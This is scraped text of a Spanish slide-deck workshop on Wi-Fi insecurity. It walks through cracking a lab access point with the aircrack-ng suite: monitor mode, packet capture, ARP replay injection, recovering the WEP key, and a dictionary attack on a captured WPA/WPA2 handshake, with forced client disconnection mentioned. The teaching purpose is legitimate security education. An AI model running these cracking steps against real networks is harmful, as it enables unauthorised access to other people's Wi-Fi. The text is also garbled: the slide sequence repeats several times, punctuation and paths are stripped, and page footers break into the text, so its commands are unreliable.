7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994
WPAWPA2
bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)
bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)
bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash
Pre-Shared Key (PSK)
bull Vulnerables a ataques de diccionario
WPAWPA2 Handshake
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094
WPAWPA2 - Handshake
WPAWPA2 ndash El ataque
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194
WPAWPA2 ndash El ataque
WPAWPA2 ndash Iniciando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294
anaacutelisis
bull
Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0
WPAWPA2 ndash Esperando al
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394
cliente
bull
Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten
bull WPA Handshake
WPAWPA2 ndash Preparando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494
diccionario
bull
Teclearlspentestpasswordswordlistdarkc0delst
WPAWPA2 ndash Usando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594
diccionario
bull Teclear aircrack-ng WPACrackingDemo-01cap ndash
w pentestpasswordswordlistsdarkc0delst
WPAWPA2 ndash Obteniendo la
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694
llave
bull
Se utilizan las combinaciones de frases deldiccionario
Conectaacutendonos con WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794
Conectaacutendonos con WEP
bull
Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12
bull Para comprobar tecleamos iwconfig wlan0
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894
Conectaacutendonos con WPA
bull
Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado
wpa-suppconf
bull Teclear wpa_passphrase ldquoWirelessLabpassword gt
etcwpa_supplicantwpa_supplicantconf
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994
Conectaacutendonos con WPA
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094
Conectaacutendonos con WPA
bull
Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf
Utilizando el cliente DHCP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194
Utilizando el cliente DHCP
bull
Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294
Queacute aprendimos
Gracias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394
Gracias
Dr Eduardo Ceh Varela
eduardocehutmetropolitanaedumx
Referencias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494
Referencias
bull
httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-
informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida
bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works
bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml
bull CASP Study Guidebull BackTrack 5 Wireless Beginners
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794
WEP
bull RC4 cifrado por corriente (stream cipher )
bull Llave (key) conocida por el cliente y el AP
bull
Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits
bull El problema es el tamantildeo limitado de los IV
WEP I i i d l aacuteli i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894
WEP ndash Iniciando el anaacutelisis
bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0
WEP Preparando la captura
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994
WEP - Preparando la captura
bullTeclear airodump-ng mon0 para detectar el AP
bull Teclear airodump-ng - -bssid aabbccddeeff - -
chanell 11 - -write WEPCrackingDemo mon0
WEP Capturando los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094
WEP ndash Capturando los paquetes
WEP Detectando al cliente
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194
WEP ndash Detectando al cliente
bull
Detectamos cuando un cliente se conecta a lared utilizando WEP
WEP Archivos generados
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294
WEP ndash Archivos generados
bull
Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394
WEP ndash Creando maacutes traacutefico
bull
Necesitamos generar traacutefico para obtener maacutescapturas en Data
bull Se utilizaraacuten paquetes ARP para generar traacutefico
bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494
WEP ndash Creando maacutes traacutefico
bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594
WEP - Encontrando la llave
bull
Teclear aircrack-ng WEPCrackingDemo-01cap
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694
WEP ndash Encontrando la llave
bull
Paquetes requeridos gt= 100 K
Tiempo de un video
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794
Tiempo de un video
bull
Mientras esperamos veamos un video
Seguridad en redes Wi-Fi (intypedia)
bull Intypedia es una enciclopedia online de
seguridad de informacioacuten
WEP Llave Encontrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894
WEP ndash Llave Encontrada
WPAWPA2
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994
WPAWPA2
bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)
bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)
bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash
Pre-Shared Key (PSK)
bull Vulnerables a ataques de diccionario
WPAWPA2 Handshake
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094
WPAWPA2 - Handshake
WPAWPA2 ndash El ataque
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194
WPAWPA2 ndash El ataque
WPAWPA2 ndash Iniciando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294
anaacutelisis
bull
Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0
WPAWPA2 ndash Esperando al
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394
cliente
bull
Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten
bull WPA Handshake
WPAWPA2 ndash Preparando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494
diccionario
bull
Teclearlspentestpasswordswordlistdarkc0delst
WPAWPA2 ndash Usando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594
diccionario
bull Teclear aircrack-ng WPACrackingDemo-01cap ndash
w pentestpasswordswordlistsdarkc0delst
WPAWPA2 ndash Obteniendo la
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694
llave
bull
Se utilizan las combinaciones de frases deldiccionario
Conectaacutendonos con WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794
Conectaacutendonos con WEP
bull
Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12
bull Para comprobar tecleamos iwconfig wlan0
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894
Conectaacutendonos con WPA
bull
Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado
wpa-suppconf
bull Teclear wpa_passphrase ldquoWirelessLabpassword gt
etcwpa_supplicantwpa_supplicantconf
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994
Conectaacutendonos con WPA
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094
Conectaacutendonos con WPA
bull
Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf
Utilizando el cliente DHCP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194
Utilizando el cliente DHCP
bull
Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294
Queacute aprendimos
Gracias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394
Gracias
Dr Eduardo Ceh Varela
eduardocehutmetropolitanaedumx
Referencias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494
Referencias
bull
httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-
informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida
bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works
bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml
bull CASP Study Guidebull BackTrack 5 Wireless Beginners
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894
WEP ndash Iniciando el anaacutelisis
bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0
WEP Preparando la captura
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994
WEP - Preparando la captura
bullTeclear airodump-ng mon0 para detectar el AP
bull Teclear airodump-ng - -bssid aabbccddeeff - -
chanell 11 - -write WEPCrackingDemo mon0
WEP Capturando los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094
WEP ndash Capturando los paquetes
WEP Detectando al cliente
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194
WEP ndash Detectando al cliente
bull
Detectamos cuando un cliente se conecta a lared utilizando WEP
WEP Archivos generados
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294
WEP ndash Archivos generados
bull
Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394
WEP ndash Creando maacutes traacutefico
bull
Necesitamos generar traacutefico para obtener maacutescapturas en Data
bull Se utilizaraacuten paquetes ARP para generar traacutefico
bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494
WEP ndash Creando maacutes traacutefico
bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594
WEP - Encontrando la llave
bull
Teclear aircrack-ng WEPCrackingDemo-01cap
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694
WEP ndash Encontrando la llave
bull
Paquetes requeridos gt= 100 K
Tiempo de un video
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794
Tiempo de un video
bull
Mientras esperamos veamos un video
Seguridad en redes Wi-Fi (intypedia)
bull Intypedia es una enciclopedia online de
seguridad de informacioacuten
WEP Llave Encontrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894
WEP ndash Llave Encontrada
WPAWPA2
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994
WPAWPA2
bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)
bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)
bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash
Pre-Shared Key (PSK)
bull Vulnerables a ataques de diccionario
WPAWPA2 Handshake
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094
WPAWPA2 - Handshake
WPAWPA2 ndash El ataque
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194
WPAWPA2 ndash El ataque
WPAWPA2 ndash Iniciando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294
anaacutelisis
bull
Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0
WPAWPA2 ndash Esperando al
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394
cliente
bull
Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten
bull WPA Handshake
WPAWPA2 ndash Preparando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494
diccionario
bull
Teclearlspentestpasswordswordlistdarkc0delst
WPAWPA2 ndash Usando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594
diccionario
bull Teclear aircrack-ng WPACrackingDemo-01cap ndash
w pentestpasswordswordlistsdarkc0delst
WPAWPA2 ndash Obteniendo la
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694
llave
bull
Se utilizan las combinaciones de frases deldiccionario
Conectaacutendonos con WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794
Conectaacutendonos con WEP
bull
Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12
bull Para comprobar tecleamos iwconfig wlan0
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894
Conectaacutendonos con WPA
bull
Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado
wpa-suppconf
bull Teclear wpa_passphrase ldquoWirelessLabpassword gt
etcwpa_supplicantwpa_supplicantconf
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994
Conectaacutendonos con WPA
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094
Conectaacutendonos con WPA
bull
Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf
Utilizando el cliente DHCP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194
Utilizando el cliente DHCP
bull
Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294
Queacute aprendimos
Gracias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394
Gracias
Dr Eduardo Ceh Varela
eduardocehutmetropolitanaedumx
Referencias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494
Referencias
bull
httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-
informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida
bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works
bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml
bull CASP Study Guidebull BackTrack 5 Wireless Beginners
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994
WEP - Preparando la captura
bullTeclear airodump-ng mon0 para detectar el AP
bull Teclear airodump-ng - -bssid aabbccddeeff - -
chanell 11 - -write WEPCrackingDemo mon0
WEP Capturando los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094
WEP ndash Capturando los paquetes
WEP Detectando al cliente
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194
WEP ndash Detectando al cliente
bull
Detectamos cuando un cliente se conecta a lared utilizando WEP
WEP Archivos generados
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294
WEP ndash Archivos generados
bull
Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394
WEP ndash Creando maacutes traacutefico
bull
Necesitamos generar traacutefico para obtener maacutescapturas en Data
bull Se utilizaraacuten paquetes ARP para generar traacutefico
bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494
WEP ndash Creando maacutes traacutefico
bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594
WEP - Encontrando la llave
bull
Teclear aircrack-ng WEPCrackingDemo-01cap
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694
WEP ndash Encontrando la llave
bull
Paquetes requeridos gt= 100 K
Tiempo de un video
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794
Tiempo de un video
bull
Mientras esperamos veamos un video
Seguridad en redes Wi-Fi (intypedia)
bull Intypedia es una enciclopedia online de
seguridad de informacioacuten
WEP Llave Encontrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894
WEP ndash Llave Encontrada
WPAWPA2
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994
WPAWPA2
bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)
bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)
bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash
Pre-Shared Key (PSK)
bull Vulnerables a ataques de diccionario
WPAWPA2 Handshake
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094
WPAWPA2 - Handshake
WPAWPA2 ndash El ataque
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194
WPAWPA2 ndash El ataque
WPAWPA2 ndash Iniciando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294
anaacutelisis
bull
Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0
WPAWPA2 ndash Esperando al
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394
cliente
bull
Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten
bull WPA Handshake
WPAWPA2 ndash Preparando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494
diccionario
bull
Teclearlspentestpasswordswordlistdarkc0delst
WPAWPA2 ndash Usando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594
diccionario
bull Teclear aircrack-ng WPACrackingDemo-01cap ndash
w pentestpasswordswordlistsdarkc0delst
WPAWPA2 ndash Obteniendo la
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694
llave
bull
Se utilizan las combinaciones de frases deldiccionario
Conectaacutendonos con WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794
Conectaacutendonos con WEP
bull
Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12
bull Para comprobar tecleamos iwconfig wlan0
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894
Conectaacutendonos con WPA
bull
Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado
wpa-suppconf
bull Teclear wpa_passphrase ldquoWirelessLabpassword gt
etcwpa_supplicantwpa_supplicantconf
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994
Conectaacutendonos con WPA
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094
Conectaacutendonos con WPA
bull
Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf
Utilizando el cliente DHCP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194
Utilizando el cliente DHCP
bull
Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294
Queacute aprendimos
Gracias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394
Gracias
Dr Eduardo Ceh Varela
eduardocehutmetropolitanaedumx
Referencias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494
Referencias
bull
httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-
informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida
bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works
bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml
bull CASP Study Guidebull BackTrack 5 Wireless Beginners
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094
WEP ndash Capturando los paquetes
WEP Detectando al cliente
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194
WEP ndash Detectando al cliente
bull
Detectamos cuando un cliente se conecta a lared utilizando WEP
WEP Archivos generados
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294
WEP ndash Archivos generados
bull
Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394
WEP ndash Creando maacutes traacutefico
bull
Necesitamos generar traacutefico para obtener maacutescapturas en Data
bull Se utilizaraacuten paquetes ARP para generar traacutefico
bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494
WEP ndash Creando maacutes traacutefico
bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594
WEP - Encontrando la llave
bull
Teclear aircrack-ng WEPCrackingDemo-01cap
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694
WEP ndash Encontrando la llave
bull
Paquetes requeridos gt= 100 K
Tiempo de un video
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794
Tiempo de un video
bull
Mientras esperamos veamos un video
Seguridad en redes Wi-Fi (intypedia)
bull Intypedia es una enciclopedia online de
seguridad de informacioacuten
WEP Llave Encontrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894
WEP ndash Llave Encontrada
WPAWPA2
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994
WPAWPA2
bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)
bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)
bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash
Pre-Shared Key (PSK)
bull Vulnerables a ataques de diccionario
WPAWPA2 Handshake
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094
WPAWPA2 - Handshake
WPAWPA2 ndash El ataque
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194
WPAWPA2 ndash El ataque
WPAWPA2 ndash Iniciando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294
anaacutelisis
bull
Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0
WPAWPA2 ndash Esperando al
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394
cliente
bull
Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten
bull WPA Handshake
WPAWPA2 ndash Preparando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494
diccionario
bull
Teclearlspentestpasswordswordlistdarkc0delst
WPAWPA2 ndash Usando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594
diccionario
bull Teclear aircrack-ng WPACrackingDemo-01cap ndash
w pentestpasswordswordlistsdarkc0delst
WPAWPA2 ndash Obteniendo la
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694
llave
bull
Se utilizan las combinaciones de frases deldiccionario
Conectaacutendonos con WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794
Conectaacutendonos con WEP
bull
Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12
bull Para comprobar tecleamos iwconfig wlan0
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894
Conectaacutendonos con WPA
bull
Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado
wpa-suppconf
bull Teclear wpa_passphrase ldquoWirelessLabpassword gt
etcwpa_supplicantwpa_supplicantconf
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994
